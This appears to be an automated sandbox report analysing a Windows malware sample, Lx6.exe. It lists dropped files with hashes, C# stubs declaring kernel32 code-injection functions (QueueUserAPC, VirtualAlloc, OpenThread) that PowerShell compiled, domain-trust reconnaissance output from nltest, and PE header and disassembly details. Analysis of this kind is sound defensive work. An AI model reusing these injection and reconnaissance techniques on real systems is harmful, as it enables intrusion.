Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class eyoluiidmup. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr shtskfruaek,IntPtr nxcjsjshatc,IntPtr oryck);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint icv,uint tulhsch,IntPtr rubl);.. }..}.

C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (348), with no line terminators
Category:	dropped
Size (bytes):	351
Entropy (8bit):	5.25961361651255
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f5Fzxs7+AEszIwkn23f5nAn:p37Lvkmb6KRfxFWZEifxnA
MD5:	41EA27173EA5237D3FB04E0938CFE468
SHA1:	72F134BE8AB8EE4B90D48AB1C70A6E0CC8496E19
SHA-256:	82F2B3ED6D202F625A3B3922D95F0C850DB9DF82223336CB2808E076EB10AB48
SHA-512:	ED806EA91C88220F294FB15A362D22B0E86C7D25B684DC8D2764478682C801A3F9971D000F56708E9000BA83DE65322CF9F25B072DAD7AB00B56C50E7D402C53
Malicious:	true
Reputation:	unknown
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\iyr5jfx4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\iyr5jfx4.0.cs"

C:\Users\user\AppData\Local\Temp\iyr5jfx4.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.624097342383811
Encrypted:	false
SSDEEP:	24:etGSc8mmUcg85BIFtNA6o45yK1PtkZf1rYhkWI+ycuZhNtakS7PNnq:6eXcb5BIVHZyKAJ1oH1ulta3xq
MD5:	78D2CB92273FA086CE6EF0C4A2A2062E
SHA1:	EA7959992DCB2CC3DA8B8357845452F128D15C23
SHA-256:	C287B25A6439BE1E8BCDA7CB34A3E4768AE477A22B0F308BA801A5757A9CF57C
SHA-512:	483E3855E53CBE21785EB7B5E432F07823B6454AC15D9F8D37202C8728340FB33C7B8A44DECDEC4FF137D35312DC2C3F961B69DDBBCBE40EDA0CC915672BA880
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...YiEc...........!.................$... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..`.............................................................(....BSJB............v4.0.30319......l...H...#~......@...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................7.0...............$.......................#.............. >............ K............ ^.....P ......i.........o.....{...........................i. ...i...!.i.%...i............3.7.....>.......K.......^...........

C:\Users\user\AppData\Local\Temp\iyr5jfx4.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (427), with CRLF, CR line terminators
Category:	modified
Size (bytes):	848
Entropy (8bit):	5.329767570905719
Encrypted:	false
SSDEEP:	24:AId3ka6KRfEEifx1KaM5DqBVKVrdFAMBJTH:Akka6CEEuLKxDcVKdBJj
MD5:	F7BFFD90D92AC40E0E09A685268B5166
SHA1:	3B81539C8B5081E1C48C8FCD3A1F79C7662E4DE4
SHA-256:	9360F920DE793FB46C49399584E51E1CD57EC7B6A05503B227CE3EF86EE4CE02
SHA-512:	6781E649350280DC287FBC48F45468BD0E7AA5A698F44092F869D08225A8019E34982FB21ABAA0E8F0BF790C6C806D807E13F94C0D36788E728844F889A91F10
Malicious:	false
Reputation:	unknown
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\iyr5jfx4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\iyr5jfx4.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\jxpjpfgv.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	400
Entropy (8bit):	5.009731388510524
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJPFMRSRa+eNMjSSRrwsJbF4JSSRNf9ONU2hqfYy:V/DTLDfuZV9eg5rnbCvRicQy
MD5:	ACA9704199C51FDE14B8BF8165BC2A4C
SHA1:	789B408CCAD29240BD093515CBD19A199AD2C1C8
SHA-256:	CB3DA8A9768252634F8ED4C62E026DC8217B055E00F11B6012A52ED130C92C27
SHA-512:	A8C1DF598581F508ECBF1E516744F11ABFB71EC6BB9895D0B61F15E70E56E27CB40B4E5395B9411B787F8BB4F264CA704D815260677909DC1E599D601D0B5DE6
Malicious:	false
Reputation:	unknown
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class rxp. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint bktrlwbb,uint jvtwfryoxhu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr wcsq,uint kwadeor,uint sxyudrlevk,uint wvqgwsxfs);.. }..}.

C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (348), with no line terminators
Category:	dropped
Size (bytes):	351
Entropy (8bit):	5.262801964221568
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fjMUzxs7+AEszIwkn23fja:p37Lvkmb6KRfgUWZEif+
MD5:	6E87DCCF81F408D0D005D726FB2EBC7B
SHA1:	8F4B2A0C2D059A3C3367624C837575DD8B780B52
SHA-256:	7AEA6EAABC761D4E0727E8D57BF63509E75CF50297E8559F928F2D8309354C8A
SHA-512:	E69B36EF073614CCCF5247312D86B71EB0BE3A389DE2078254DE9239A970EEAB998E56FBDD9C4EB59461E1781A3231E33ABBFA1A1ACF6FE3E77D6FEF23B8426A
Malicious:	false
Reputation:	unknown
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jxpjpfgv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jxpjpfgv.0.cs"

C:\Users\user\AppData\Local\Temp\jxpjpfgv.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6212555479867756
Encrypted:	false
SSDEEP:	24:etGSL8OmU0t3lm85xAqZhqtedWhoytkZfh4PUWI+ycuZhNciakS3jPNnq:65XQ3r5xAqiOWhSJh4P31ulcia33Jq
MD5:	E38E89CE8DC5DA8A0E9BEF10B5E19F15
SHA1:	F63F7475EF2DCA8129782EC0832E19C9D2C6ECEC
SHA-256:	F6CE234E0983854AF6CD792B97E555C3F39755C43C5ACC37966B0DC93D91C0B5
SHA-512:	AA0AE0F995CFB1C3016CDDC95AD4EDDD2B238EB0232C4BA70EA5AA6B1896EEE5D6A49605F8E05E10E7DD8D5AC792F7B884DF2C7AAD6A1E7444F7C355EFB4CD29
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\iEc...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(............... ...................................... 6............ H............ P.....P ......].........c.....l.....x.....}...............]. ...]...!.].%...]............3.3.....6.......H.......P...........

C:\Users\user\AppData\Local\Temp\jxpjpfgv.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (427), with CRLF, CR line terminators
Category:	modified
Size (bytes):	848
Entropy (8bit):	5.332008921213867
Encrypted:	false
SSDEEP:	24:AId3ka6KRfg1EiffKaM5DqBVKVrdFAMBJTH:Akka6CQEufKxDcVKdBJj
MD5:	3D16A2B045885BC6BC6B152FAB36AB4E
SHA1:	05EDFD5B920187BCEEBD93E656C2046E5A4F1B13
SHA-256:	331987B5EC04F61671E1044FDF6A98AC4A7BA37B513C73B49CBBA4C104AD6F94
SHA-512:	BEF3ED07BF25AA429EDA761FBED40775C3DF708EF285D6C15D168B21D50B31F4C33C3A61BC2A4F49C7F00431A92AB0C69156D77CB7ECAEE519B8D04ADE573F4D
Malicious:	false
Reputation:	unknown
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jxpjpfgv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jxpjpfgv.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\msihj3zd.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	410
Entropy (8bit):	4.963679469380117
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJ7PMRSR7a1e3amPZERG9cQJSSRa+rVSSRnA/fzTmOoqy:V/DTLDfupnh3NP62v9rV5nA/+OFy
MD5:	9A10482ACB9E6952B96F4EFC24D9D783
SHA1:	5CFC9BF668351DF25FCDA98C3C2D0BB056C026C3
SHA-256:	A0424E1530F002761A882C19C22504153A5E86D7FBB41391E940452BFA15F377
SHA-512:	E932914AD99D7BD39561E020D1E8C1F4E175C16EAE66DF720100C65E40CCC3383B5145F703432885F3F1CE080E8A4FEB045DDD5C8BBC2F3231C619D04182AC28
Malicious:	false
Reputation:	unknown
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class eyoluiidmup. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr shtskfruaek,IntPtr nxcjsjshatc,IntPtr oryck);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint icv,uint tulhsch,IntPtr rubl);.. }..}.

C:\Users\user\AppData\Local\Temp\msihj3zd.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (348), with no line terminators
Category:	dropped
Size (bytes):	351
Entropy (8bit):	5.238728345472457
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f/OWt+zxs7+AEszIwkn23f/OW1n:p37Lvkmb6KRfONWZEifOo
MD5:	8E560ADAE2A4E65EFEDF1480CB1BEC6D
SHA1:	65FF7F856A25D372758B4283BDBC1E75F04F748F
SHA-256:	96AFAAAD879E57C2F41001F8B7A39C78E1FC26684DBD19C394A173E87AC5EA36
SHA-512:	DC9D33A05168645C7F0A863456C10D3EFF9EF4444DC4F3359F4A19EAFD3116CEF101111E36D560909636A106316AE3480B90DEDDA951C83794DCD6158BDA5107
Malicious:	false
Reputation:	unknown
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\msihj3zd.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\msihj3zd.0.cs"

C:\Users\user\AppData\Local\Temp\msihj3zd.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6197342351514084
Encrypted:	false
SSDEEP:	24:etGSw8mmUcg85BIFtNA6dx45yK1PtkZfs1lchkWI+ycuZhN5pYakSmpNPNnq:6CXcb5BIVHuyKAJs1aH1ul5ia3mJq
MD5:	B0E7264EC04A22CF4907E47C0B9E652A
SHA1:	77920522398FBB457DC198F19B6EA9FFE547F153
SHA-256:	E6EEEDFBE01E9EB3E6092E94D61FD537F92BD11A725BBF73F338BC1C26F450FA
SHA-512:	3C31A6C39F2E63CB28EFE03EBB55199CFAFDCFF1CBA42786EB4F45B37DD716571AA4CBDA6749484FF00786647A73B746F1EBF890B938E63D40F3E92CEFAD1C6F
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....iEc...........!.................$... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..`.............................................................(....BSJB............v4.0.30319......l...H...#~......@...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................7.0...............$.......................#.............. >............ K............ ^.....P ......i.........o.....{...........................i. ...i...!.i.%...i............3.7.....>.......K.......^...........

C:\Users\user\AppData\Local\Temp\msihj3zd.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (427), with CRLF, CR line terminators
Category:	modified
Size (bytes):	848
Entropy (8bit):	5.321699664902414
Encrypted:	false
SSDEEP:	24:AId3ka6KRfOiEifOdKaM5DqBVKVrdFAMBJTH:Akka6COiEuOdKxDcVKdBJj
MD5:	9F6C27FDCF8BE079EBB365AADCF60111
SHA1:	FE7A519F262401A6737DEAD508FF60343DF484D3
SHA-256:	E6EE327BAA0B0F06C70BBA8426F9384A73A6FFCC1FE7E22704535333767AF394
SHA-512:	DB4EE270D4DE0719342A73C21D3318424EA13FAD2488ECF6D22C7FA67EA23CE0BF8B2985665C09C418FBF39482BD7426BA983FF26F6C1C5DEB44B52304806C40
Malicious:	false
Reputation:	unknown
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\msihj3zd.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\msihj3zd.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\vupj0yhs.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	400
Entropy (8bit):	5.009731388510524
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJPFMRSRa+eNMjSSRrwsJbF4JSSRNf9ONU2hqfYy:V/DTLDfuZV9eg5rnbCvRicQy
MD5:	ACA9704199C51FDE14B8BF8165BC2A4C
SHA1:	789B408CCAD29240BD093515CBD19A199AD2C1C8
SHA-256:	CB3DA8A9768252634F8ED4C62E026DC8217B055E00F11B6012A52ED130C92C27
SHA-512:	A8C1DF598581F508ECBF1E516744F11ABFB71EC6BB9895D0B61F15E70E56E27CB40B4E5395B9411B787F8BB4F264CA704D815260677909DC1E599D601D0B5DE6
Malicious:	false
Reputation:	unknown
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class rxp. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint bktrlwbb,uint jvtwfryoxhu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr wcsq,uint kwadeor,uint sxyudrlevk,uint wvqgwsxfs);.. }..}.

C:\Users\user\AppData\Local\Temp\vupj0yhs.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (348), with no line terminators
Category:	dropped
Size (bytes):	351
Entropy (8bit):	5.247994812995126
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fYqzxs7+AEszIwkn23fYP:p37Lvkmb6KRfAqWZEifAP
MD5:	339334B154CE1D3CA1A117562DD8E974
SHA1:	D600CBC9C52B76E9EACFCD87AC1E80F07CFA33D9
SHA-256:	E64EDFE26E2A57197F58A00B0BED45D7C42394B108E5D574C39339E88F7E83B6
SHA-512:	68A103108708D7082152C64E523FB9B90061C2450925C9A4157D213F3B8B9038132B31D9FE90D71770D19D5DCE8CA85C9257A89ADB2D5CEA8B27BB30B4A513F7
Malicious:	false
Reputation:	unknown
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vupj0yhs.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vupj0yhs.0.cs"

C:\Users\user\AppData\Local\Temp\vupj0yhs.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.616515604399693
Encrypted:	false
SSDEEP:	24:etGSqls8OmU0t3lm85xAqZhqidWhoytkZfzeUWI+ycuZhNBakSvPNnq:6emXQ3r5xAqicWhSJze31ulBa3tq
MD5:	F49B29BB3482B2AE2D9467860AFDC125
SHA1:	68F9D5289A0E6CEFA745A75136F8F6B319752097
SHA-256:	AAAB10BF07C27FECA11A65C13C798EB184B5442F2362A6C3CA8ABDC8800B714E
SHA-512:	33A7651DE2C07B625CF2EDD20BD47734F9BD9E0CB20F273D725575CF2A4C4AEC9A0279849B83092D7EA884E04B89CAD0B1089E8045031700A42CA250D8892187
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jEc...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(............... ...................................... 6............ H............ P.....P ......].........c.....l.....x.....}...............]. ...]...!.].%...]............3.3.....6.......H.......P...........

C:\Users\user\AppData\Roaming\Microsoft\MarkClass

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	54
Entropy (8bit):	4.239175068238206
Encrypted:	false
SSDEEP:	3:NMXPRV5g7UjcRIGnTjFZa:qXPRV5g7U0nba
MD5:	D525BBDF44DDD1FE96CE008DC0B63C09
SHA1:	F09DBA251BFE2B1D245EC341A1B3A79FE603140E
SHA-256:	1ADCEB6B75E25E9A2AFACFF7B18A7CC6475C62787CF15BEC88C228ADA6EB45C7
SHA-512:	4DB1F5D6C3A8DE4EFB131ECB0D344D364449D126C7C8A7EAC825305188DAC1524782A69D35EA98DA5A055074C56D752A85FC3399DBB0BF3B3310EE83077D780C
Malicious:	false
Reputation:	unknown
Preview:	11-10-2022 15:04:25 \| "0xaaa494e7_6314cd46c4ff5" \| 0..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	4481
Entropy (8bit):	3.7930133822256877
Encrypted:	false
SSDEEP:	48:F3kV04PJdL9P9Az9Pfoi8/wSogZob9Y9PT9Pfoi8/wSogZob9Y9jH:yV04j9P96vmHg9Y97vmHg9Y9r
MD5:	93E04B1FA8B054CD47097EDAFE9A9F44
SHA1:	F74F6484C037C5E56F25D92A6BC491980C61C0C9
SHA-256:	0AFB0B97B9D66851F840DFE48734CEE3956CD79E1A1DE256B5BA01CF3065D165
SHA-512:	26197CD44FD908F4ACBF0567A06DDD4B2A4E92C800BF38FCFD12854536E089D12CA9FE7C63CF5E3A00E7851B63D884E7712B11FFFEB68600A8516A8A44FFF2BB
Malicious:	false
Reputation:	unknown
Preview:	...................................FL..................F. .. ....e..q....m-.q....e..q...F.........................:..DG..Yr?.D..U..k0.&...&...........-...e..q...../.q.......t.".CFSF..2.F...KUhh .WHITEB~1.LNK....t.Y^...H.g.3..(.....gVA.G..k...L......KUhhKUhh....T}........................W.h.i.t.e.B.o.o.k...l.n.k...H...K...............-.......J...........-........C:\Users\user\WhiteBook.lnk..`.......X.......374653...........!a..%.H.VZAj...-1X.eI...........!a..%.H.VZAj...-1X.eI..................Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ...........................FL..................F.".. ....#N.........-...#N......@...........................P.O. .:i.....+00.../C:\...................V.1......U1m..Windows.@......L..KU'h..............................W.i.n.d.o.w.s.....Z.1......U+m..System32..B......L..KU'h.............................S.y.s.t.e.m.3.2.....l.1......L...WINDOW~1..T.....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O5JBBM3G0ZBJCNQGHQJ3.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	4481
Entropy (8bit):	3.7930133822256877
Encrypted:	false
SSDEEP:	48:F3kV04PJdL9P9Az9Pfoi8/wSogZob9Y9PT9Pfoi8/wSogZob9Y9jH:yV04j9P96vmHg9Y97vmHg9Y9r
MD5:	93E04B1FA8B054CD47097EDAFE9A9F44
SHA1:	F74F6484C037C5E56F25D92A6BC491980C61C0C9
SHA-256:	0AFB0B97B9D66851F840DFE48734CEE3956CD79E1A1DE256B5BA01CF3065D165
SHA-512:	26197CD44FD908F4ACBF0567A06DDD4B2A4E92C800BF38FCFD12854536E089D12CA9FE7C63CF5E3A00E7851B63D884E7712B11FFFEB68600A8516A8A44FFF2BB
Malicious:	false
Reputation:	unknown
Preview:	...................................FL..................F. .. ....e..q....m-.q....e..q...F.........................:..DG..Yr?.D..U..k0.&...&...........-...e..q...../.q.......t.".CFSF..2.F...KUhh .WHITEB~1.LNK....t.Y^...H.g.3..(.....gVA.G..k...L......KUhhKUhh....T}........................W.h.i.t.e.B.o.o.k...l.n.k...H...K...............-.......J...........-........C:\Users\user\WhiteBook.lnk..`.......X.......374653...........!a..%.H.VZAj...-1X.eI...........!a..%.H.VZAj...-1X.eI..................Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ...........................FL..................F.".. ....#N.........-...#N......@...........................P.O. .:i.....+00.../C:\...................V.1......U1m..Windows.@......L..KU'h..............................W.i.n.d.o.w.s.....Z.1......U+m..System32..B......L..KU'h.............................S.y.s.t.e.m.3.2.....l.1......L...WINDOW~1..T.....

\Device\ConDrv

Download File

Process:	C:\Windows\System32\nltest.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	80
Entropy (8bit):	4.981198332810094
Encrypted:	false
SSDEEP:	3:OQIyB2FBKs8YIC2ERyH+ch6wrkIZHv:OQIygF88FXcRrkcP
MD5:	4FDBAE9775A20DC33DEC05E408C2A2AD
SHA1:	3EAA51632F2BEAE23D9811B9FF91E31C91092177
SHA-256:	228CD867898AB0B81D31212B2DA03CC3E349C9000DFB33E77410E2937CEA8532
SHA-512:	6FF34B7848CE3DBCE1D150107B54A1903D074058C04DE0B8B647071F5E310045CC7A7E74F6B6EED24E2E54F5C10B0899B63CF97D6A40C9DA07C3BBE373B294BB
Malicious:	false
Reputation:	unknown
Preview:	Enumerating domain trusts failed: Status = 1722 0x6ba RPC_S_SERVER_UNAVAILABLE..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.475018130166141
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Lx6.exe
File size:	38400
MD5:	3b892bea0f8cbe0b61ee380743567d1d
SHA1:	90522132e3a97e966e5270a8e105cc33f0d6c4e5
SHA256:	6b722961edc010c5487de4ef7eee84b586ac3c3f06dbd1920935ea5f7bb90543
SHA512:	120c7f3d22858dd7cb02f67bf6ff38dd9ba1f32d6fdfe18c7f9dde76ab20b435f98f4e4e54b7967422755cb6dedf0c575d360a1339c3a4cff69f556647045e3b
SSDEEP:	768:Z41V8UHIm2wyBdcNtW2RTYBfx6w39rDE3Lkjx2K/ZK38ua:ZefIZwAdeD8B56w39HE384h38
TLSH:	F103F1A418107CBFDF2FE13B6315E11EA5B583C1150B0EC9E274E6DDE276422EA5C28E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.................l.........S.............v.......k.......n.....Rich............PE..L......b...................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x401af6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x62DFB311 [Tue Jul 26 09:25:37 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	a225a198dd77b77924eb15a705beb665

Entrypoint Preview

Instruction
push esi
xor esi, esi
push esi
push 00400000h
push esi
call dword ptr [0040301Ch]
mov dword ptr [00404160h], eax
cmp eax, esi
je 00007F6FACCFD137h
push esi
call dword ptr [00403008h]
mov dword ptr [00404170h], eax
call dword ptr [00403040h]
call 00007F6FACCFCC62h
push dword ptr [00404160h]
mov esi, eax
call dword ptr [0040303Ch]
push esi
call dword ptr [00403044h]
pop esi
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
push 00000020h
call 00007F6FACCFC899h
mov esi, eax
test esi, esi
je 00007F6FACCFD1D1h
mov eax, dword ptr [00404184h]
lea eax, dword ptr [eax+00405014h]
push eax
call dword ptr [00403008h]
mov edi, dword ptr [00403078h]
mov ebx, eax
mov eax, dword ptr [00404184h]
lea eax, dword ptr [eax+00405151h]
push eax
push ebx
mov dword ptr [ebp-04h], 0000007Fh
call edi
mov dword ptr [esi+0Ch], eax
test eax, eax
je 00007F6FACCFD18Eh
mov eax, dword ptr [00404184h]
lea eax, dword ptr [eax+00405161h]
push eax
push ebx
call edi
mov dword ptr [esi+10h], eax
test eax, eax
je 00007F6FACCFD178h
mov eax, dword ptr [00404184h]
lea eax, dword ptr [eax+00405174h]
push eax
push ebx
call edi
mov dword ptr [esi+14h], eax
test eax, eax
je 00007F6FACCFD162h
mov eax, dword ptr [00404184h]
lea eax, dword ptr [eax+00000000h]

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3100	0x50	.rdata
